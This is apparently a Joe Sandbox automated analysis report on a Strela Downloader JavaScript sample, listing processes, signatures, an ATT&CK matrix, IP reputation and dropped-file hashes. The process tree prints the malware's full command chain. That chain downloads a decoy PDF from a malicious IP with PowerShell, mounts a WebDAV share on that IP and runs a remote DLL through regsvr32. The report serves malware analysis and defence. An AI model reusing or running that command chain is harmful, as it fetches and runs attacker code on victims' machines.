Windows
Analysis Report
2165116371124411090.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 5936 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\21651 1637112441 1090.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 5932 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\143 6711084295 35.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6024 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5024 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 2168 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 3352 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 5916 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=20 88 --field -trial-han dle=1744,i ,181614300 3070977363 5,14504383 4519382751 29,131072 --disable- features=B ackForward Cache,Calc ulateNativ eWinOcclus ion,WinUse BrowserSpe llChecker /prefetch: 8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 2224 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 22 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 22 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
7% | Virustotal | Browse | ||
3% | ReversingLabs |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1589905 |
Start date and time: | 2025-01-13 10:12:12 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 7s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 17 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 2165116371124411090.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/45@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
- Excluded IPs from analysis (whitelisted): 184.28.88.176, 162.159.61.3, 172.64.41.3, 2.23.242.162, 2.22.50.144, 2.22.50.131, 23.209.209.135, 2.22.242.123, 2.22.242.136, 2.23.197.184, 2.16.168.107, 2.16.168.105, 2.22.242.11, 23.200.0.33, 23.200.0.21, 192.168.2.6, 13.107.253.45, 20.12.23.50, 52.6.155.20, 23.47.168.24
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, armmf.adobe.com, geo2.adobe.com
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
04:13:21 | API Interceptor | |
04:13:25 | API Interceptor | |
04:13:26 | API Interceptor | |
04:13:33 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7263199904850965 |
Encrypted: | false |
SSDEEP: | 1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0h:9JZj5MiKNnNhoxug |
MD5: | 212AC7777298A5B90AE092204B6B9B4D |
SHA1: | 895D686FEB9772631D8EB5E72E2E8CAC29697712 |
SHA-256: | B13E87621B85F7C844814A86E15C2FB44F79B98E9B4EDD45C20356B4287CD455 |
SHA-512: | 96542F50535C66F38945160365951DFE19ACBA8A7CC13492A302374BF53F5AF89653B039F021DDD4537E33CC2F0FA42F88628B40C77626839A604C14A6522D28 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7555839871187919 |
Encrypted: | false |
SSDEEP: | 1536:NSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:NazaSvGJzYj2UlmOlOL |
MD5: | 9495488F8351D2331184C153F7835D3D |
SHA1: | ADE414165C3C0181D0D69C3217833BAF3CDAED21 |
SHA-256: | FC34C664000FC9CD1C4B2CCC474EA3BEDDAD5EEAAF86156F2BE4B4AC6230B611 |
SHA-512: | 7CCD6F52863EEFDF956A92000635B318EA4BBEA38D29765920223B7CDE684A0D9889D911C84E79D951CA92A65B60C0CAF0A158EBDAD95A00900A3FF39E3AA9D5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.07944236420307607 |
Encrypted: | false |
SSDEEP: | 3:mptKYeIuR80jluNaAPaU1lokY8/ltolluxmO+l/SNxOf:mDKz/R80BuNDPaUwR8tGgmOH |
MD5: | 80423CEF8899A50B2DE4C14574C60521 |
SHA1: | 4621A8B66A4CDE085F578CF946381A145F5A3663 |
SHA-256: | 0FA5F5551DC0D456BD36F36DD97291E3FD811C0D1827307CEF946805010651E6 |
